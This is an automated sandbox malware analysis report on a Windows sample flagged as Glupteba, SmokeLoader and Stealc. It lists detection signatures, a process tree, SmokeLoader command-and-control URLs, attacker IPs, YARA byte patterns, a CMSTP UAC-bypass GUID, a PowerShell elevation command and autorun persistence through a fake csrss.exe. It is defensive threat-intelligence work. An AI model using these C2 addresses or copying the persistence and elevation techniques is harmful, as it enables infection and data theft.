Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ccQGH1mKws.exe

Overview

General Information

Sample name:ccQGH1mKws.exe
renamed because original name is a hash value
Original sample name:29c6c5ed9d80c710d6b1df200d90e388.exe
Analysis ID:1389368
MD5:29c6c5ed9d80c710d6b1df200d90e388
SHA1:4b2d34d2623e4a611a0f175f0073184de2eeab3d
SHA256:9fa5c3ae48914ecc23baac692f938f031388692048e10e2154a61dca492e22f1
Tags:exe
Infos:

Detection

Glupteba, SmokeLoader, Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
UAC bypass detected (Fodhelper)
Yara detected Glupteba
Yara detected SmokeLoader
Yara detected Stealc
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to infect the boot sector
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Drops PE files with benign system names
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious Process Parents
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: System File Execution Location Anomaly
Suspicious powershell command line found
Tries to detect sandboxes / dynamic malware analysis system (file name check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to resolve many domain names, but no domain seems valid
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Connects to several IPs in different countries
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ccQGH1mKws.exe (PID: 1648 cmdline: C:\Users\user\Desktop\ccQGH1mKws.exe MD5: 29C6C5ED9D80C710D6B1DF200D90E388)
    • explorer.exe (PID: 3504 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • 8837.exe (PID: 4120 cmdline: C:\Users\user\AppData\Local\Temp\8837.exe MD5: 151E9EC4F0355D2F131B871671BD5E20)
        • 8837.exe (PID: 4984 cmdline: C:\Users\user\AppData\Local\Temp\8837.exe MD5: 151E9EC4F0355D2F131B871671BD5E20)
      • 8E91.exe (PID: 4248 cmdline: C:\Users\user\AppData\Local\Temp\8E91.exe MD5: 50F2E865696BEEB3C20E1F05DC72D03C)
        • WerFault.exe (PID: 2656 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 1396 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • 93D2.exe (PID: 1624 cmdline: C:\Users\user\AppData\Local\Temp\93D2.exe MD5: 1996A23C7C764A77CCACF5808FEC23B0)
      • regsvr32.exe (PID: 3608 cmdline: regsvr32 /s C:\Users\user\AppData\Local\Temp\97EA.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
        • regsvr32.exe (PID: 4588 cmdline: /s C:\Users\user\AppData\Local\Temp\97EA.dll MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • A6A0.exe (PID: 4460 cmdline: C:\Users\user\AppData\Local\Temp\A6A0.exe MD5: 7176404D8394DECDC9399BB62C01A2FF)
        • A6A0.tmp (PID: 5252 cmdline: "C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmp" /SL5="$20424,8085089,54272,C:\Users\user\AppData\Local\Temp\A6A0.exe" MD5: 426607EDCEEC6A310076FA659B073D1D)
          • A6A0.exe (PID: 2284 cmdline: "C:\Users\user\AppData\Local\Temp\A6A0.exe" /SPAWNWND=$20422 /NOTIFYWND=$20424 MD5: 7176404D8394DECDC9399BB62C01A2FF)
            • A6A0.tmp (PID: 1676 cmdline: "C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp" /SL5="$20434,8085089,54272,C:\Users\user\AppData\Local\Temp\A6A0.exe" /SPAWNWND=$20422 /NOTIFYWND=$20424 MD5: 426607EDCEEC6A310076FA659B073D1D)
              • anyburnfree.exe (PID: 6756 cmdline: "C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe" -i MD5: EB428F0ECD8AD6907A62E6A0ACEAB53F)
              • anyburnfree.exe (PID: 5428 cmdline: "C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe" -s MD5: EB428F0ECD8AD6907A62E6A0ACEAB53F)
      • csrss.exe (PID: 6004 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: 151E9EC4F0355D2F131B871671BD5E20)
        • csrss.exe (PID: 6572 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: 151E9EC4F0355D2F131B871671BD5E20)
      • BB62.exe (PID: 2720 cmdline: C:\Users\user\AppData\Local\Temp\BB62.exe MD5: CEAE65EE17FF158877706EDFE2171501)
        • InstallSetup4.exe (PID: 2016 cmdline: "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe" MD5: 28B72E7425D6D224C060D3CF439C668C)
          • BroomSetup.exe (PID: 2936 cmdline: C:\Users\user\AppData\Local\Temp\BroomSetup.exe MD5: 5E94F0F6265F9E8B2F706F1D46BBD39E)
            • cmd.exe (PID: 3788 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 6296 cmdline: chcp 1251 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
        • FourthX.exe (PID: 7144 cmdline: "C:\Users\user\AppData\Local\Temp\FourthX.exe" MD5: B03886CB64C04B828B6EC1B2487DF4A4)
          • powershell.exe (PID: 5912 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 5408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • FourthX.exe (PID: 7020 cmdline: "C:\Users\user\AppData\Local\Temp\FourthX.exe" MD5: B03886CB64C04B828B6EC1B2487DF4A4)
      • DC49.exe (PID: 2028 cmdline: C:\Users\user\AppData\Local\Temp\DC49.exe MD5: BA79778FB5C76EE86A3719452732A68B)
  • afratej (PID: 4516 cmdline: C:\Users\user\AppData\Roaming\afratej MD5: 29C6C5ED9D80C710D6B1DF200D90E388)
  • 93D2.exe (PID: 2036 cmdline: "C:\Users\user\AppData\Local\Temp\93D2.exe" MD5: 1996A23C7C764A77CCACF5808FEC23B0)
  • svchost.exe (PID: 2688 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 3412 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4248 -ip 4248 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 4980 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
GluptebaGlupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://goodfooggooftool.net/index.php", "http://sulugilioiu19.net/index.php", "http://selebration17io.io/index.php", "http://vacantion18ffeu.cc/index.php", "http://valarioulinity1.net/index.php", "http://buriatiarutuhuob.net/index.php", "http://cassiosssionunu.me/index.php"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\BB62.exeMALWARE_Win_DLInjector04Detects downloader / injectorditekSHen
    • 0x8ad454:$s1: Runner
    • 0x8ad5b9:$s3: RunOnStartup
    • 0x8ad468:$a1: Antis
    • 0x8ad495:$a2: antiVM
    • 0x8ad49c:$a3: antiSandbox
    • 0x8ad4a8:$a4: antiDebug
    • 0x8ad4b2:$a5: antiEmulator
    • 0x8ad4bf:$a6: enablePersistence
    • 0x8ad4d1:$a7: enableFakeError
    • 0x8ad5e2:$a8: DetectVirtualMachine
    • 0x8ad607:$a9: DetectSandboxie
    • 0x8ad632:$a10: DetectDebugger
    • 0x8ad641:$a11: CheckEmulator
    C:\Users\user\AppData\Local\Temp\BroomSetup.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000001.00000002.1549966457.0000000000529000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x331e:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      0000000A.00000002.1813537584.0000000000413000.00000004.00000001.01000000.0000000A.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000018.00000002.1889731561.0000000002800000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        00000006.00000002.1793881515.00000000006D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          00000006.00000002.1793881515.00000000006D0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
          • 0x6a4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
          Click to see the 23 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          39.3.DC49.exe.2c50000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            39.2.DC49.exe.2c40e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              39.2.DC49.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                10.2.93D2.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  10.2.93D2.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                  • 0x10000:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                  • 0x100a0:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                  • 0x10170:$s2: Elevation:Administrator!new:
                  Click to see the 6 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Files With System Process Name In Unsuspected Locations
                  Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\8837.exe, ProcessId: 4984, TargetFilename: C:\ProgramData\Drivers\csrss.exe
                  Sigma detected: Suspicious Process Parents
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\ProgramData\Drivers\csrss.exe" , CommandLine: "C:\ProgramData\Drivers\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\Drivers\csrss.exe, NewProcessName: C:\ProgramData\Drivers\csrss.exe, OriginalFileName: C:\ProgramData\Drivers\csrss.exe, ParentCommandLine: "C:\ProgramData\Drivers\csrss.exe" , ParentImage: C:\ProgramData\Drivers\csrss.exe, ParentProcessId: 6004, ParentProcessName: csrss.exe, ProcessCommandLine: "C:\ProgramData\Drivers\csrss.exe" , ProcessId: 6572, ProcessName: csrss.exe
                  Sigma detected: Suspicious Script Execution From Temp Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, CommandLine|base64offset|contains: J, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\FourthX.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\FourthX.exe, ParentProcessId: 7144, ParentProcessName: FourthX.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, ProcessId: 5912, ProcessName: powershell.exe
                  Sigma detected: System File Execution Location Anomaly
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\ProgramData\Drivers\csrss.exe" , CommandLine: "C:\ProgramData\Drivers\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\Drivers\csrss.exe, NewProcessName: C:\ProgramData\Drivers\csrss.exe, OriginalFileName: C:\ProgramData\Drivers\csrss.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3504, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\ProgramData\Drivers\csrss.exe" , ProcessId: 6004, ProcessName: csrss.exe
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Drivers\csrss.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\8837.exe, ProcessId: 4984, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CSRSS
                  Sigma detected: Execution of Suspicious File Type Extension
                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\afratej, CommandLine: C:\Users\user\AppData\Roaming\afratej, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\afratej, NewProcessName: C:\Users\user\AppData\Roaming\afratej, OriginalFileName: C:\Users\user\AppData\Roaming\afratej, ParentCommandLine: , ParentImage: , ParentProcessId: 1124, ProcessCommandLine: C:\Users\user\AppData\Roaming\afratej, ProcessId: 4516, ProcessName: afratej
                  Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Drivers\csrss.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\8837.exe, ProcessId: 4984, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, CommandLine|base64offset|contains: J, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\FourthX.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\FourthX.exe, ParentProcessId: 7144, ParentProcessName: FourthX.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, ProcessId: 5912, ProcessName: powershell.exe
                  Sigma detected: Windows Processes Suspicious Parent Directory
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 2688, ProcessName: svchost.exe

                  Snort Signatures

                  Timestamp:192.168.2.9185.196.8.2249848802049467 02/08/24-19:09:48.378633
                  SID:2049467
                  Source Port:49848
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249842802049467 02/08/24-19:09:44.987581
                  SID:2049467
                  Source Port:49842
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9104.21.83.220497244432050578 02/08/24-19:08:05.573279
                  SID:2050578
                  Source Port:49724
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.991.215.85.12049805802039103 02/08/24-19:09:26.979597
                  SID:2039103
                  Source Port:49805
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249839802049467 02/08/24-19:09:43.381058
                  SID:2049467
                  Source Port:49839
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249894802049467 02/08/24-19:10:13.584334
                  SID:2049467
                  Source Port:49894
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249857802049467 02/08/24-19:09:53.283760
                  SID:2049467
                  Source Port:49857
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.991.215.85.12049851802039103 02/08/24-19:09:49.817059
                  SID:2039103
                  Source Port:49851
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.991.215.85.12049860802039103 02/08/24-19:09:55.041923
                  SID:2039103
                  Source Port:49860
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249903802049467 02/08/24-19:10:17.403786
                  SID:2049467
                  Source Port:49903
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.991.215.85.12049823802039103 02/08/24-19:09:33.949203
                  SID:2039103
                  Source Port:49823
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249781802049467 02/08/24-19:09:15.459025
                  SID:2049467
                  Source Port:49781
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249875802049467 02/08/24-19:10:03.126917
                  SID:2049467
                  Source Port:49875
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249866802049467 02/08/24-19:09:58.797137
                  SID:2049467
                  Source Port:49866
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2258448802049467 02/08/24-19:10:23.285920
                  SID:2049467
                  Source Port:58448
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249777802049467 02/08/24-19:09:13.070039
                  SID:2049467
                  Source Port:49777
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249790802049467 02/08/24-19:09:19.898015
                  SID:2049467
                  Source Port:49790
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.91.1.1.152640532050564 02/08/24-19:08:02.058928
                  SID:2050564
                  Source Port:52640
                  Destination Port:53
                  Protocol:UDP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249870802049467 02/08/24-19:10:01.244716
                  SID:2049467
                  Source Port:49870
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2255644802049467 02/08/24-19:10:21.597294
                  SID:2049467
                  Source Port:55644
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249884802049467 02/08/24-19:10:07.960153
                  SID:2049467
                  Source Port:49884
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.991.215.85.12049710802039103 02/08/24-19:08:00.180755
                  SID:2039103
                  Source Port:49710
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249814802049467 02/08/24-19:09:30.889842
                  SID:2049467
                  Source Port:49814
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249861802049467 02/08/24-19:09:55.192469
                  SID:2049467
                  Source Port:49861
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249769802049467 02/08/24-19:09:08.703004
                  SID:2049467
                  Source Port:49769
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.991.215.85.12049815802039103 02/08/24-19:09:31.259796
                  SID:2039103
                  Source Port:49815
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9189.232.12.9049761802039103 02/08/24-19:08:55.741638
                  SID:2039103
                  Source Port:49761
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249800802049467 02/08/24-19:09:25.351895
                  SID:2049467
                  Source Port:49800
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249899802049467 02/08/24-19:10:15.587384
                  SID:2049467
                  Source Port:49899
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249858802049467 02/08/24-19:09:53.913966
                  SID:2049467
                  Source Port:49858
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249806802049467 02/08/24-19:09:27.119106
                  SID:2049467
                  Source Port:49806
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249876802049467 02/08/24-19:10:03.749517
                  SID:2049467
                  Source Port:49876
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249771802049467 02/08/24-19:09:09.317682
                  SID:2049467
                  Source Port:49771
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249824802049467 02/08/24-19:09:33.946899
                  SID:2049467
                  Source Port:49824
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249787802049467 02/08/24-19:09:18.142809
                  SID:2049467
                  Source Port:49787
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9172.67.199.120497204432050572 02/08/24-19:08:03.774246
                  SID:2050572
                  Source Port:49720
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249847802049467 02/08/24-19:09:47.755322
                  SID:2049467
                  Source Port:49847
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249865802049467 02/08/24-19:09:58.184006
                  SID:2049467
                  Source Port:49865
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249776802049467 02/08/24-19:09:12.488524
                  SID:2049467
                  Source Port:49776
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.91.1.1.153481532050565 02/08/24-19:08:03.594306
                  SID:2050565
                  Source Port:53481
                  Destination Port:53
                  Protocol:UDP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9189.232.12.9049744802039103 02/08/24-19:08:42.322004
                  SID:2039103
                  Source Port:49744
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249819802049467 02/08/24-19:09:32.072105
                  SID:2049467
                  Source Port:49819
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249816802049467 02/08/24-19:09:31.489254
                  SID:2049467
                  Source Port:49816
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249782802049467 02/08/24-19:09:16.038969
                  SID:2049467
                  Source Port:49782
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
